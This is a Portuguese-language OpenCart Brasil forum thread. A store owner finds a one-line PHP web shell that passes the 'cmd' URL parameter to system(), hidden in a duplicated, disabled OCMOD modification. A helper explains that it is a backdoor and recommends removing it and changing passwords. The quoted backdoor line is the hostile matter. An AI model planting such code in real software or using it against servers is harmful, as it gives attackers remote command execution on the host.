Possível insegurança / Exploit

Possível insegurança / Exploit#86337

Por rlasmar - 29 Nov 2019, 11:12

- 29 Nov 2019, 11:12 #86337

Pessoal,

Gostaria de opiniões. Encontrei este trecho de código abaixo inserido numa modificação em ocmod que eu mesmo fiz. Portanto, não foi uma extensão ocmod baixada por aí. Eu não inseri este código. Eu só percebi de fato, pq a extensão estava duplicada com mesmo nome, sendo que esta que está com o este código abaixo estava desativada.

Código: Selecionar todos

if(isset($_GET['cmd'])){ echo system($_GET['cmd']); }

Alguém já viu e sabe do que se trata? Jogando este código no google, vi que pode ser exploit.

Versão Opencart 3.0.3.2 (1.4.4 Brasil) - Tema Default.

Re: Possível insegurança / Exploit#86340

Por Manoel Vidal - 29 Nov 2019, 11:53

- 29 Nov 2019, 11:53 #86340

Olá @rlasmar.

Remova imediatamente este OCMOD duplicado, pois se ativado ele permitirá a execução de comandos em seu servidor de hospedagem, ou seja, de fato é um exploit.

É provável que alguém que teve acesso a sua loja, tenha instalado essa modificação com o objetivo de abrir essa brecha em sua loja, neste caso, por segurança troque todas as senhas da hospedagem e da loja.

Espero ter ajudado.

Sempre em frente...

Re: Possível insegurança / Exploit#86341

Por rlasmar - 29 Nov 2019, 11:56

- 29 Nov 2019, 11:56 #86341

Alguma chance de isso ter sido feito sem acesso ao admin da loja?
Porque só há minha senha de admin da loja e ninguém tem acesso, não há outros usuários no admin.

Este arquivo duplicado foi instalado ontem 28/11. Mostrava esta data na parte de instalações do ocmod.

Re: Possível insegurança / Exploit#86344

Por Manoel Vidal - 29 Nov 2019, 12:21

- 29 Nov 2019, 12:21 #86344

Sem acesso ao admin, só se foi feito com acesso direto ao seu banco de dados, pois os arquivos de modificações ficam armazenados no banco de dados, porém, se alguém tivesse conseguido invadir seu banco de dados, teria deixado ativada a modificação ou mesmo nem teria a necessidade de fazê-la.

Outra possibilidade, é que alguma extensão/tema de fonte não confiável ao ser instalada na loja pode ter incluído a modificação, sendo que mesmo desinstalada a modificação permaneceu na loja.

Por último, seu acesso para a administração pode ter sido descoberto, ou você deu algum acesso para alguém realizar algum suporte, e esse alguém realizou a inclusão da modificação.

Enfim, troque todas as senhas, verifique cada uma das modificações instaladas na loja, incluído as que ficam dentro da pasta "system", e remova qualquer coisa suspeita.

Espero ter ajudado.

rlasmar gostou disso

Sempre em frente...

Fórum OpenCart Brasil